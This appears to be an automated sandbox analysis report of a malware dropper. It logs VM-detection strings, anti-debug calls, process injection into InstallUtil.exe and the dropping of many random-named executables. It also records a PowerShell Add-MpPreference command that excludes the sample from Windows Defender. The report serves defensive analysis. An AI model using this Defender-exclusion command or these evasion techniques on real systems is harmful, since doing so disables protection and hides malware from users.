                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                        Source: BroomSetup.exe, 00000014.00000002.3180389400.0000000000A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*dB
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeAPI call chain: ExitProcess graph end nodegraph_12-6771
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeAPI call chain: ExitProcess graph end nodegraph_16-3615
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79122
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79143
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79125
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-80160
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79144
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79136
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-78965
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end nodegraph_17-79166
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00417B4E
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004502C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00415DC0 mov eax, dword ptr fs:[00000030h]17_2_00415DC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,17_2_00404C70
                        Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00419DC7 SetUnhandledExceptionFilter,17_2_00419DC7
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00417B4E
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004173DD
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6A3DB1F7
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6A3DB66C
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A58AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6A58AC62
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\file.exeSection unmapped: unknown base address: 400000
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,17_2_00415D00
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 105F008
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,14_2_00478504
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe Process created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
